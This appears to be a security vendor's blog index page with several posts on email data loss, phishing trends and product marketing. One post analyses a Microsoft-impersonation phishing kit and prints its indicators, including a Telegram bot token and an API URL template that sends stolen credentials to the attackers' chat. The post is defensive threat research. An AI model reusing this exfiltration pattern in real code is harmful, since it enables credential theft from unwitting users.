Request a Demo of Tessian Today.

Automatically stop data breaches and security threats caused by employees on email. Powered by machine learning, Tessian detects anomalies in real-time, integrating seamlessly with your email environment within minutes and starting protection in a day. Provides you with unparalleled visibility into human security risks to remediate threats and ensure compliance.

Move beyond your SEG with Tessian’s SEG Consolidation Wizard  | Generate Report Now →

Tessian Blog

  • All
  • Customer Stories
  • Compliance
  • Email DLP
  • Integrated Cloud Email Security
  • Data & Trends
  • NULL
    array(14) { [0]=> object(WP_Term)#10847 (11) { ["term_id"]=> int(5) ["name"]=> string(16) "Customer Stories" ["slug"]=> string(16) "customer-stories" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(5) ["taxonomy"]=> string(8) "category" ["description"]=> string(155) "Read our latest Customer Stories, interviews and news. Learn how Tessian protects organisations in Financial Services, Legal, Technology and other markets." ["parent"]=> int(0) ["count"]=> int(46) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "2" } [1]=> object(WP_Term)#11305 (11) { ["term_id"]=> int(120) ["name"]=> string(10) "Compliance" ["slug"]=> string(10) "compliance" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(120) ["taxonomy"]=> string(8) "category" ["description"]=> string(143) "Read our latest articles, tips and news on Compliance including GDPR, CCPA and other industry-specific regulations and compliance requirements." ["parent"]=> int(0) ["count"]=> int(40) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "5" } [2]=> object(WP_Term)#11304 (11) { ["term_id"]=> int(116) ["name"]=> string(9) "Email DLP" ["slug"]=> string(20) "data-loss-prevention" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(116) ["taxonomy"]=> string(8) "category" ["description"]=> string(144) "Read our latest articles, tips and industry-specific news around Data Loss Prevention (DLP). Learn about the implications of data loss on email." ["parent"]=> int(0) ["count"]=> int(99) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "4" } [3]=> object(WP_Term)#11303 (11) { ["term_id"]=> int(2) ["name"]=> string(31) "Integrated Cloud Email Security" ["slug"]=> string(20) "human-layer-security" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(2) ["taxonomy"]=> string(8) "category" ["description"]=> string(301) "Integrated Cloud Email Security solutions were introduced as a new category, and positioned as the best defense against advanced phishing threats that evade traditional email security controls.  Learn more about what they are, the benefits of using them, and how you can best evaluate those on offer." ["parent"]=> int(0) ["count"]=> int(134) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "1" } [4]=> object(WP_Term)#11302 (11) { ["term_id"]=> int(486) ["name"]=> string(17) "Data & Trends" ["slug"]=> string(11) "data-trends" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(486) ["taxonomy"]=> string(8) "category" ["description"]=> string(0) "" ["parent"]=> int(352) ["count"]=> int(1) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "3" } [5]=> object(WP_Term)#11301 (11) { ["term_id"]=> int(341) ["name"]=> string(13) "Insider Risks" ["slug"]=> string(13) "insider-risks" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(341) ["taxonomy"]=> string(8) "category" ["description"]=> string(154) "Access Tessian's library of free data exfiltration posts, guides and trend insights. Acidental data loss, insider threats, and misdirected emails content." ["parent"]=> int(490) ["count"]=> int(39) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "2" } [6]=> object(WP_Term)#11300 (11) { ["term_id"]=> int(433) ["name"]=> string(14) "Remote Working" ["slug"]=> string(14) "remote-working" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(433) ["taxonomy"]=> string(8) "category" ["description"]=> string(163) "Access free tips from security leaders and new research related to remote working and hybrid-remote structures. Level-up your cybersecurity for a remote workforce." ["parent"]=> int(116) ["count"]=> int(16) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "1" } [7]=> object(WP_Term)#11299 (11) { ["term_id"]=> int(384) ["name"]=> string(7) "Podcast" ["slug"]=> string(7) "podcast" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(384) ["taxonomy"]=> string(8) "category" ["description"]=> string(345) "Cybersecurity podcast series on the human factor, discussing why we need to focus on people - not just machines and data - to stop breaches and empower employees. Tim Sadler, CEO of Tessian meets with business, IT and security leaders to flip the strict on cybersecurity and share best practices, cybersecurity challenges, threat intel and more." ["parent"]=> int(2) ["count"]=> int(9) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "1" } [8]=> object(WP_Term)#11298 (11) { ["term_id"]=> int(411) ["name"]=> string(14) "Threat Stories" ["slug"]=> string(14) "threat-stories" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(411) ["taxonomy"]=> string(8) "category" ["description"]=> string(155) "Tessian Threat Intelligence and Research team uncovers trends and insights in email security related to phishing, social engineering, and more. Learn more!" ["parent"]=> int(0) ["count"]=> int(24) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "3" } [9]=> object(WP_Term)#11297 (11) { ["term_id"]=> int(3) ["name"]=> string(22) "Advanced Email Threats" ["slug"]=> string(22) "advanced-email-threats" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(3) ["taxonomy"]=> string(8) "category" ["description"]=> string(166) "Get up to speed on the latest tips, guides, industry news and technology developments around phishing, spear phishing, Business Email Compromise, and Account Takeover" ["parent"]=> int(490) ["count"]=> int(154) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "6" } [10]=> object(WP_Term)#10853 (11) { ["term_id"]=> int(352) ["name"]=> string(15) "Life at Tessian" ["slug"]=> string(12) "team-culture" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(352) ["taxonomy"]=> string(8) "category" ["description"]=> string(149) "Learn more about Tessian company news, events, and culture directly from different teams. Hear from engineering, product, customer success, and more." ["parent"]=> int(0) ["count"]=> int(47) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "7" } [11]=> object(WP_Term)#11263 (11) { ["term_id"]=> int(435) ["name"]=> string(21) "Interviews With CISOs" ["slug"]=> string(21) "ciso-spotlight-series" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(435) ["taxonomy"]=> string(8) "category" ["description"]=> string(164) "Learn how to navigate the threat landscape, how to get buy-in, and how to break into the industry from these cybersecurity leaders from Shell, Penn State, and more." ["parent"]=> int(0) ["count"]=> int(33) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "8" } [12]=> object(WP_Term)#11264 (11) { ["term_id"]=> int(436) ["name"]=> string(16) "Engineering Blog" ["slug"]=> string(16) "engineering-blog" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(436) ["taxonomy"]=> string(8) "category" ["description"]=> string(134) "Tessian's engineering team shares tips for solving complex problems. Get advice related to QAs, 502 errors, team management, and more." ["parent"]=> int(352) ["count"]=> int(18) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "1" } [13]=> object(WP_Term)#10842 (11) { ["term_id"]=> int(434) ["name"]=> string(16) "Cyber Skills Gap" ["slug"]=> string(16) "cyber-skills-gap" ["term_group"]=> int(0) ["term_taxonomy_id"]=> int(434) ["taxonomy"]=> string(8) "category" ["description"]=> string(149) "Learn more about the cybersecurity skills gap and cybersecurity gender gap. Research and interviews with industry leaders and champions of diversity." ["parent"]=> int(435) ["count"]=> int(19) ["filter"]=> string(3) "raw" ["term_order"]=> string(1) "1" } }
Insider Risks, Email DLP
How Tessian Stops Your Data Leaving When Staff Do
by Andrew Webb Wednesday, January 11th, 2023
 As our recent research revealed, 71% of security leaders told us that resignations increase security risks for their organization, and 45% said incidents of data exfiltration increased in 2022, as people took data when they left their jobs. As we head into 2023, the current economic climate coupled with restructuring in most sectors can only add to these concerns. There’s also the security strain felt by everyone who remains the organization as they try to backfill roles and do their jobs under what might be sometimes difficult circumstances. Other challenges include users being more remote, security teams having too many incidents to investigate, and in the colder months – plain old flu. Misdirected #email today (fortunately not at all sensitive – phew) driven by flu-brain 🤒 served as a near miss to remind me why the #security work being done by the team at @Tessian is so important — Sabrina Castiglione (@Castiglione_S) January 9, 2023
Tessian can help remedy insider risks such as these, both malicious exfiltration and accidental data loss, in several ways. Let’s deal with the malicious ones first. As an integrated cloud email security solution, Tessian comes with a variety of policies straight out of the box. Or you can design your own custom policies based on specific actions, teams or data points. 
For example, you might want a policy to flag for severe data exfiltration from staff who you know are leaving. Not only that, you can decide what action to take and simply track exfiltration attempts, warn the user or require justification from their manager before releasing the email. Different teams might have different levels of controls; teams that handle highly sensitive information like sales data or company code or IP, might have more sensitive controls than say marketing. 
How to stop accidental data loss Then of course there’s accidental data loss. Despite training, turning off auto-complete, and Accidental data loss remains a problem for organizations. According to our  Psychology of Human Error report  two in five respondents (40%) have sent work emails to the wrong person. This isn’t just embarrassing, it can result in a loss of business. The same report found that nearly a third (29%) of businesses have lost a client or customer as a result of email recipient errors. Tessian can stop these misdirected emails too, providing in the moment alerts to warn users that something’s not quite right. At Tessian, we’ve built a comprehensive and intelligent cloud email security platform that deploys in seconds via a single API. Using deep content inspection and your historical email data. Tessian forms a behavioral intelligence model that understands how your people use email. We know who they contact, what they send and receive, and what projects they’re working on. Simply put, we know when an incident occurs because we understand how your people usually behave.
Read Blog Post
Integrated Cloud Email Security
How to replace your Secure Email Gateway with an Integrated Cloud Email Security solution
by Andrew Webb Tuesday, December 13th, 2022
Here at Tessian we’ve built the world’s most comprehensive and intelligent cloud email security platform that deploys in minutes via a single API. But what does that ‘soup to nuts’ deployment look like? And when’s best to do it? Well someone who knows in detail is our Senior Sales Engineer, Tam Huynh. We caught up with him to hear how previous Tessian customers have done it in the past.
Briefly explain the history of Integrated Cloud Email Security Integrated Cloud Email Security evolved because of the way Secure Email Gateways handle threats. Historically, you took a look at established data sets and threat signals. You have a static analysis which looks at the hashes of the file, or simply checks the reputation of that hash.  Beyond that they may sandbox that hash to be able to do some behavioral analysis. But a lot of times with account takeovers and business email compromise today, there’s no malicious payloads. ICES evolved to leverage behavioral intelligence or machine learning to analyze the threat signals or the data sets that are missed or ignored by secure email gateways.  So Tessian examines things like the unique writing styles between one person and another, looking for anomalies such as a sudden switch to a more formal salutation or sign off, or unusual IP address location. These are just some of the thousands of threat signals and variables Tessian can analyze.
How long does it take to deploy an Integrated Cloud Email Security solution? The application programming interfaces (APIs) that Tessian uses have given us a way to be able to deploy advanced and intricate solutions to Microsoft 365 in around 20 minutes, depending on how quickly the administrator can get the author credentials. Users enter the credentials inside of our portal, and they grant permissions to the Tessian console, let us know which groups to sync, and they’re done.  If we look back a decade on how SEG were deployed, it could take well over a month or more of multiple phase approaches, changing control windows, testing within a lab or a sandbox first, and then rolling over to production. This is much faster.
How does Tessian work with existing tech stacks as well as new ones?  So from what we’re seeing, many customers are looking to essentially replace their SEGs. So what we’ll typically do is a full feature map of their SEG, and then recommend Microsoft 365 E5 license that allows them to be able to leverage features such as sandboxing and behavioral analysis as well as several other regular features that are found in a SEG. And if some clients choose to retain their SEGs and have 365 E5, that’s fine too.  For organizations not looking to move to Microsoft 365, who might have an on premise exchange server, or are using G Suite, Tessian can leverage a gateway testing deployment, which means an install time of around an hour. And that’s from start to finish. Either way, deploying via the APIs or Gateway means no worrying about modifying MX records.
How should companies communicate ICES to the rest of the business?  So as we’ve seen you can deploy an ICES in under an hour, but that might come as a shock to other teams around the organization, so a clear communication strategy is as important as the technical deployment strategy.  You need to ensure all of the relevant teams have a heads up well ahead of time, especially the non-technical teams. For example, is this going to affect any imminent sales? Does the Customer Success team need to inform customers? Also don’t forget to let the leadership team know. Finally, use the skills of the comms team to help get the information out to the wider organization, and have them on standby in the rare case of there being an issue.  Finally, is there a right time to deploy an ICES?  Yes! Not at 5pm on the penultimate Thursday or Friday in the quarter when sales might be trying to hit target! The ideal time we’ve found with Tessian customers is after business hours on a Monday. The mail volume is down, so it wouldn’t be noticed by the end users.
Read Blog Post
Threat Stories
2022 Tessian Threat Intel Roundup: Social Engineering Threats Are Here to Stay
by Tessian Thursday, December 8th, 2022
As we close out the year, one thing is certain: Social engineering attacks will remain a mainstay for threat actors. The ease with which threat actors are able to exploit human vulnerabilities will find even the most secure organizations wanting. This is why according to Tessian’s inaugural State of Email Security Report (2022), impersonation attacks are the number 1 concern for organizations globally. Only by adopting a defense-in-depth strategy will organizations be able to reduce the risk of falling victim to social engineering-based attacks.    In this final newsletter for the year we take a look at some of the dominant themes we’ve covered in 2022.   Sign-up for our Threat Intel update to get this monthly update straight to your inbox.   
Top Threat Intel Themes Covered in 2022 1. Phishing-as-a-Service Goes Mainstream Phishing remains a persistent threat and security challenge.  Phishing-as-a-Service offerings continue to evolve and proliferate on the dark web, reducing barriers to entry and effectively creating whole new armies of threat actors. Threat actors continue having significant success using phishing and business email compromise campaigns (BEC) to compromise organizations.  This helps explain why social engineering attacks in the form of phishing and BEC are the top two costliest forms of a breach, topping out at $4.91 and $4.89 million, respectively.    2. Impersonation campaigns continue evolving Earlier in the year we started tracking an increase in 3rd party impersonation campaigns that were leveraging PayPal to carry out invoice fraud.  Other impersonation campaigns that came across the wire included threat actors targeting the legal sector – a sector that is disproportionately targeted by social engineering attacks. We’ve also found that obfuscation is the name of the game for malicious payload delivery. The continued persistence of brand impersonation campaigns is also cause for concern. In fact, the FTC reported a sharp increase in impersonation fraud, with losses totaling $2 billion in the period October 2020 to September 2021.  We expect these trends to continue, evidenced by record breaking phishing activity in 2022, for the first time surpassing 1 million phishing attacks reported in a quarter.    3. The Unrelenting Scourge of Ransomware  One of the recurring themes we have been tracking is the nexus between ransomware and spear phishing attacks.  Ransomware has proven to be a persistent security challenge with the rise of Ransomware-as-a-Service (RaaS) offerings. The increase in ransomware related damages – seeing a 57x increase from 2015 – is one of the main reasons driving up cyber insurance premiums, seeing increases of over 100% in the past 18 months. We expect nation-state and non-aligned threat actors to continue relying on ransomware and related extortion tactics, with email a key threat vector for payload delivery.   4. The rise, and rise, of credential compromises Another trend we have been closely following is the increasing prevalence of credential related compromises. One such noteworthy adversary-in-the-middle (AiTM) compromise saw 10,000 organizations that use Microsoft targeted.   Several large organizations have suffered credential related compromises, shining a spotlight on the fallibility of identity and access management (IAM) solutions in relation to the threat that social engineering poses. Credential compromise social engineering campaigns that target organizations using  Microsoft 365 and Google Workspace collaboration software, will remain a core focus area for threat actors going forward.   5. Event opportunism As so often is the case, cyber criminals, the opportunists that they are, will attempt to exploit international and national events, including acts of war, pandemics and festive events. This reality was on full display at the start of the Russian invasion of Ukraine. We noted that over 70% of newly registered Ukraine themed domains were likely to be malicious. We expected a ramp-up of Russian cyber campaign activity in the wake of the Russian invasion of Ukraine, however this has failed to materialize.  Effective public-private partnerships as demonstrated by Microsoft and others are part of the reason for the unprecedented level of cyber resilience by Ukraine and allied countries.   
Concluding Thoughts & Recommended Actions   Only by adopting a multi-pronged, defense-in-depth security strategy will the risk of social-engineering-related breaches be reduced. Utilizing best-in-breed cybersecurity solutions that have behavioral intelligence-based defensive capabilities, and that reinforce security culture strengthening like Tessian, is increasingly essential to address an ever-evolving social engineering threatscape.    Until next year, stay safe and stay secure.
To see how Tessian prevents ransomware attacks, and protects against DLP, watch a product overview video or book a demo.   For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn
Read Blog Post
Email DLP, Advanced Email Threats
How Tessian stops Impersonation Attacks
by Andrew Webb Friday, December 2nd, 2022
Every cyber attack that gets through hurts your organization’s staff, but impersonation attacks are particularly damaging to the individual who’s targeted. In this example, we see how Tessian can stop these types of attacks and protect staff so they can do their best work. 
While attackers will target almost anyone in an organization to gain access, teams in areas closest to the money – namely the finance team – are often the most at risk.  Finance teams handle hundreds of invoice payments a month, and are responsible for your organization’s cash flow. And when it comes to payroll they interact with every other employee in the company. This is why they represent high value targets to attackers.  There are four types of impersonation; multi-persona, brands, individuals, and vendors. And we’ll look at the last one – vendors – In this example. You can see how the Tessian Cloud Email Security Platform has flagged this email to Calvin in the  finance team asking for an invoice payment. OSINT tools and the victim organization’s own blog and social media might reveal a typical third party that they’ve worked with, in this fictitious example, it’s a supplier called Darkhill Health.  There are several reasons why Tessian has flagged this as a potential impersonation attempt and stopped it from reaching Calvin’s inbox. Let’s look at them in more detail.  Firstly, examination of the URL reveals the letter i in @darkhill-health has been replaced with the number 1.  Furthermore, we can see there is an unusual display name, Philip Davis rather than the typical Philip J Davis found in other emails from Darkhill Heath.  There’s also a fake use of the RE: reply in the subject line, giving the impression that this is part of a sequence of email exchanges, even though it’s the first email in the chain from this fake domain. Finally, and this is one of the hardest things for legacy solutions to determine, there is suspicious financial intent as the sender is requesting updated payment details. Our own State of Spear Phishing report shows that the most successful attacks happen just after lunch, or towards the end of the working day, when people are at their most distracted. Sent at 5:16pm on a Thursday, with just the right sense of urgency, and you can see how your employees could easily fall victim to this type of attack.
How Tessian stops these attacks.  Tessian utilizes behavioral intelligence to gain a deeper understanding of each internal and external relationship. Using deep content inspection, as well as  your historical email data, Tessian forms a behavioral intelligence model that understands how your people use email within the organization. It knows who they contact, what they send and receive, and what projects they’re working on. This advanced behavioral intelligence sits in a single cloud-based email security platform protecting your organization from both advanced incoming threats like the one above AND also stopping sensitive data leaving the organization.  All of this means this attack is stopped dead in its tracks, and never reaches Calvin’s inbox, so he can carry on with his day.
Read Blog Post
Book Recommendations for Security Professionals
by Adrian Jozwik Wednesday, November 30th, 2022
Looking for some summer reading? We’ve pulled together a little reading guide for when you get some well-earned downtime. We asked around the Tessian offices for recommendations for good reads in the tech and security space. Here’s the team’s recommendations.
Cyber Privacy: Who Has Your Data and Why You Should Care April Falcon Doss Amazon, Google, Facebook, governments. No matter who we are or where we go, someone is collecting our data: to profile us, target us, assess us; to predict our behavior and analyze our attitudes; to influence the things we do and buy — even to impact our vote. Read more at Good Reads     The Fifth Domain: Defending Our Country, Our Companies, and Ourselves in the Age of Cyber Threats Richard A. Clarke  “Great book on the challenges of cyberwarfare policy” – Paul Sanglé-Ferrière, Product Manager, Tessian. An urgent new warning from two bestselling security experts – and a gripping inside look at how governments, firms, and ordinary citizens can confront and contain the tyrants, hackers, and criminals bent on turning the digital realm into a war zone. Read more at Good Reads   The Wires of War: Technology and the Global Struggle for Power Jacob Helberg From the former news policy lead at Google, an urgent and groundbreaking account of the high-stakes global cyberwar brewing between Western democracies and the autocracies of China and Russia that could potentially crush democracy. Read more at Good Reads   This Is How They Tell Me the World Ends: The Cyberweapons Arms Race Nicole Perlroth Filled with spies, hackers, arms dealers, and a few unsung heroes, written like a thriller and a reference, This Is How They Tell Me the World Ends is an astonishing feat of journalism. Based on years of reporting and hundreds of interviews, The New York Times reporter Nicole Perlroth lifts the curtain on a market in shadow, revealing the urgent threat faced by us all if we cannot bring the global cyber arms race to heel. Read more at Good Reads.   The Art of Invisibility: The World’s Most Famous Hacker Teaches You How to Be Safe in the Age of Big Brother and Big Data Kevin Mitnick & Robert Vamosi  In The Art of Invisibility Mitnick provides both online and real life tactics and inexpensive methods to protect you and your family, in easy step-by-step instructions. He even talks about more advanced “elite” techniques, which, if used properly, can maximize your privacy. Read more at Good Reads The Cuckoo’s Egg Clifford Stoll “Probably the original threat actor report – so good” – Matt Smith, Software Engineer at Tessian In 1986,  Clifford Stoll – a systems administrator at the Lawrence Berkeley National Laboratory – wrote this book. Based on his field notes, this is arguably one of the first documented cases of a computer hack and the subsequent investigation, which eventually led to the arrest of Markus Hess. It’s now considered an essential read for anyone interested in cybersecurity. Read more at Good Reads. CISO Compass: Navigating Cybersecurity Leadership Challenges with Insights from Pioneers  Todd Fitzgerald While this book covers all the fundamentals of IT security governance and risk management, it also digs deeper into people. After all, being a CISO isn’t just about technology. The insights in the book come directly from CISOs. In total, 75 security leaders contributed to the book, which means there’s plenty of actionable advice you can apply to your strategies.  Looking for more insights from security leaders? Check out Tessian’s CISO Spotlight series. Read more at Good Reads.   Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin’s Most Dangerous Hackers  Andy Greenburg Politics play a big role in cybercrime. This book is focused on Sandworm, the group of Russian hackers who, over the last decade, has targeted American utility companies, NATO, and electric grids in Eastern Europe and paralyzed some of the world’s largest businesses with malware. But the author, Wired senior writer Andy Greenberg, also provides plenty of background on both the technology and the relationships between various countries. Read more on Good Reads.   Cult of the Dead Cow Joseph Menn Cult of the Dead Cow is the tale of the oldest, most respected, and most famous American hacking group of all time. Though until now it has remained mostly anonymous, its members invented the concept of hacktivism, released the top tool for testing password security, and created what was for years the best technique for controlling computers from afar, forcing giant companies to work harder to protect customers.  Cult of the Dead Cow explores some of the world’s most infamous hacking groups – particularly the cDc – and explains how technology, data, and – well – the world has changed because of them. Read more at Good Reads. The Making of a Manager: What to Do When Everyone Looks to You Julie Zhuo  Congratulations, you’re a manager! After you pop the champagne, accept the shiny new title, and step into this thrilling next chapter of your career, the truth descends like a fog: you don’t really know what you’re doing. Read more at Good Reads. CISM Certified Information Security Manager All-in-One Exam Guide Yes, this is an exam guide…and yes you should add it to your reading list. If nothing else, to have on-hand as a reference. Why? It covers everything. Security governance, risk management, security program development, and security incident management. Curious as to whether or not other security professionals have their CISM certification? We interviewed 12 women about their journeys in cybersecurity. Read their profiles here and the full report, Opportunity in Cybersecurity Report 2020. Read more on Good Reads. The health benefits of reading Whatever you choose to read these holidays, the health benefits of reading are well documented. As our Lost Hours report revealed, many CISOs aren’t taking time out from their jobs to de-stress and unwind. So make sure you schedule a little you time with a good book.  
Read Blog Post
Remote Working
1 in 3 Employees Do Not Understand the Importance of Cybersecurity
by Andrew Webb Saturday, November 26th, 2022
Our research report into security culture reveals a startling disconnect between security leaders’ views and those of employees when it comes to cybersecurity. Our survey of 2,000 employees in the UK and US revealed that just 39% say they’re very likely to report a security incident, making investigation and remediation even more challenging and time-consuming for security teams. When asked why, over two-fifths (42%) of employees said they wouldn’t know if they had caused an incident in the first place, and 25% say they just don’t care enough about cybersecurity to mention it – a sentiment that should set alarm bells ringing for security leaders.  What’s more, for some staff, this attitude is bleeding into their home life. 20% of employees say they don’t care about cybersecurity at work – over 1 in 10 say they don’t care about it in their personal lives! It’s clear then, that a significant percentage of employees are simply not engaged with the organization’s cybersecurity procedures and how they play their part in keeping their company secure.
Turning to IT and security leaders, virtually all of the 500 leaders we surveyed (99%) agreed that a strong security culture is important in maintaining a strong security posture. And yet despite rating their organization’s security 8 out 10, on average, three-quarters of organizations experienced a security incident in the last 12 months.  There’s clearly a disconnect here between the views of the SOC team, and those in other teams around the business, and one reason for that could be the reliance on traditional training programs. 48% of security leaders say training is one the most important influences on building a positive security posture. But the reality is that employees aren’t engaged; just 28% of UK and US workers say security awareness training is engaging and only 36% say they’re paying full attention. Of those who are, only half say it’s helpful, while another 50% have had a negative experience with a phishing simulation. 1 in 5 employees don’t even show up for SAT sessions.  As indicated above, the report also reveals a disconnect when it comes to actually reporting security risks and incidents. Eighty percent of security leaders believe robust feedback loops are in place to report incidents, but less than half of employees feel the same, suggesting clearer processes are needed so that security teams have greater visibility of risk in their organization.
Boomers v Gen Z: The Generational Divide  The report also revealed stark generational differences when it comes to cybersecurity culture perceptions. The youngest generation (18- 24 year olds) is almost three times as likely to say they’ve had a negative experience with phishing simulations when compared to the oldest generation (55+). In contrast, older employees are four times more likely to have a clear understanding of their company’s cybersecurity policies compared to their younger colleagues, and are five times more likely to follow those policies.  When it comes to risky cybersecurity practices such as reusing passwords, exfiltrating company data and opening attachments from unknown sources, younger employees are the least likely to see anything wrong with these practices. 
Read Blog Post
Threat Stories
“No Pain No Gain” Impersonation Campaign – Sending Stolen Credentials to Telegram Group
by Catalin Giana Thursday, November 10th, 2022
The Tessian Threat Intel team discovered a new Microsoft impersonation campaign in the wild called “No Pain No Gain.” The campaign utilizes a Telegram API call to harvest credentials to a malicious chat group on the messaging platform – a common tactic that was first identified last year. The threat actors also relied on heavily encoding the malicious attachment.  Read further to see how we reviewed the attachment, and the steps we took to de-obfuscate it. We also show what the harvested credentials look like when received by the Telegram BOT API. The victim receives an email with an HTML attachment called Setup Outlook-mail.html. Upon opening it you are redirected to a page that impersonates Microsoft’s login, with the victim’s email address already embedded in the page. Impersonated Microsoft login page
Although this is not impressive at this point. At face value it appears to be a run-of-the-mill impersonation campaign that has been seen before. Where it gets interesting is that upon inspecting the HTML page it is apparent that great effort was taken to obfuscate the code. Decoding the HTML attachment Obfuscated code
Step 1 The HTML page contains multiple layers of obfuscation that needed to be removed manually in order to reveal the original content. After escaping all the javascript-encoded characters we were left with a more readable script. Code snippet before base64 decoding Step 2 In order to reveal the actual HTML script we had to decode the string found in the data variable which we found out was base64 encoded. After another step of decoding and beautifying, we found the readable HTML code. Decoded data variable Outcome All the magic can be found in the code snippet above. What is unique about this campaign is the fact that instead of using a command and control server to store the stolen data, it is using the Telegram app, via the Telegram API to a malicious chat group on the messaging platform. The stolen information contains usernames and passwords that can be used to compromise Microsoft email accounts. The sent message also has the geolocation of the victim and the User-Agent that was used.
Telegram testing with our own channel We created a Telegram chat group for testing purposes to see exactly how the stolen data i.e. the credentials are harvested and sent out via the Telegram API (see graphic below). Using an impersonated Microsoft login-in page, the threat actors prompt the victim for a password, this triggers a pop-up message indicating that the first password entered is incorrect or too short. The victim is then prompted to submit a second password, which then appears to be a successful log-in.  In addition to harvesting the credentials, other collected data includes the victim’s IP address by using the ip-api.com service. All the stolen data is stored in the malicious Telegram chat group in the format below. Example of harvested credentials message  
When we use the getChat endpoint, we received the response below from the malicious Telegram group chat. We were able to identify the group ID, the group name and determine that the channel is private. Group ID   We were also able to determine that the malicious Telegram group chat has two members. Group Members   After further investigation we were unable to access the contents of the Telegram chat group due to privacy and security settings set by the threat actors. We based this determination on the fact that the value of the parameter “can_read_all_group_messages” is set to “False”. Privacy Settings
Indicators Here is a table of indicators that can be filtered or searched on in your logs for any potential past leaks, or signals for any attempts. Object Indicator Telegram Bot ID 5695672431:AAF0Bzm_wh3g13sO-CDFeWWC-k6kWv7-Emk Telegram Channel ID 5748272550 Email Attachment Filename [T1598.002] Setup Outlook-mail.htm Setup Outlook-mail.html Starting Text <script>var emai\u006c=” Telegram API Exfiltration [T1071.001] https://api[.]telegram[.]org/bot$botid_value/sendMessage?chat_id=$channel&text=$credentials $botid_value = the value that Telegram BotFather provides for the bot 5695672431:AAF0Bzm_wh3g13sO-CDFeWWC-k6kWv7-Emk $channel = the value of the channel at Telegram 5748272550 $credentials = The data that is being sent to Telegram and the fraud channel hosted there  
Conclusions and Recommendations  Don’t open attachments from unknown sources, especially if you weren’t expecting an Invoice/Outlook Setup/Resume etc. If you opened an attachment and you are still unsure please send it to your security team for review. Ensure that your organization utilizes an intelligent email security solution that can prevent and detect advanced impersonation campaigns. If you have security experience, you can open the HTML page in a text editor before running it, if it’s highly obfuscated as in the first screenshot above there is a high possibility that it’s likely to be malicious.  Additionally the US Cybersecurity and Infrastructure Security Agency (CISA) offers useful advice for staying safe as well as a list of free cybersecurity tools: The UK’s National Cyber Security Centre (NCSC) also has offers useful guidance for staying safe:
Read Blog Post
Life at Tessian
A fresh new look for a world in need of Intelligent Cloud Email Security
by Adrian Jozwik Wednesday, November 9th, 2022
When you visit Tessian’s website, download a piece of content or see our social media channels you will notice something different. We have redesigned our brand with one thing in mind, our customers. We have focused our brand to reflect what we do best and that is to protect you and your people. At Tessian, we understand the importance of helping you protect your organization from advanced cyber threats such as business email compromise ransomware while also ensuring we stop insider risks, whether accidental or malicious over email. We place this responsibility in the highest regard. Intelligence at the very core With all of this in mind, we wanted to create a brand that reflects the trust you place in us and is guided by the values we at Tessian represent. A brand that is: At the highest degree of Intelligence, where we focus on high value security technology that solves hard problems Customer centric because we know you and your people need intelligent technology that is focused on protecting, together. On the front line of intelligently protecting organizations and users with the latest in technology. The Tessian Cloud Email Security Platform utilizes unparalleled behavioral intelligence to stop the attacks that could hurt you the most. Tessian prevents attacks from coming into the inbox while protecting against intentional and accidental data loss over email by leveraging behavioral intelligence modeling. Because of this deep behavioral understanding, we can predict the right decisions each person should make when interacting with email and intervene to protect your users and your organization from email-based threats. Because Intelligence comes in all shapes and sizes Tessian’s brand had to represent not only the high levels of intelligence our products offer but also represent the people that interact with our products. The visual language we have created is more serious, more aligned with the industry we’re in, and gives a clear message of how our products work to protect you. We have delivered a new look and feel and a website to reflect our primary focus. We want our customers and partners to be able to find and recognize Tessian when they need to. For Tessian to break through the noise, it was time to come out of our shell and emphasize the capabilities we provide and the values we stand for. Make no mistake, our technology is differentiated and complete – Cloud Email Security which is unmatched at protecting you against cyber attacks, bar none. Taking a deeper look A large part of any brand is the visual identity it encapsulates for the company, and the way its products are perceived by those who experience it. We wanted to achieve a brand that was ‘FWD:Thinking’ (also the name of our recent security summit), reflecting the ever changing attack landscape our customers live in and one that stays front of mind for those that we protect.  
We started with looking at the foundations of our new brand. The most important part was to ensure we could communicate our solutions through our imagery. We decided to utilize hexagons for two reasons: Firstly they convey strength. Secondly, Tessian is built on six values; each side represents one of our values. Placing a person behind a frosted glass demonstrates the true nature to how our solutions work, keeping you safe from cyberattacks and attackers at bay. The same tile allows Tessian to see right through and see the attacks which otherwise would have been hidden from view. Furthermore, we often combine this visual device with an example of a suspect email, demonstrating how our behavioral intelligence sees its true nature. Various triggers are called out as Tessian , identifies and analyzes behaviors and highlights threat signals, coming together to drive an unparalleled level of intelligence.  
You will also see customer iconography across our new website and assets. Each icon represents different areas of the product from behavioral intelligence to preventative capabilities. Each icon holds its own place in telling the Tessian story.  
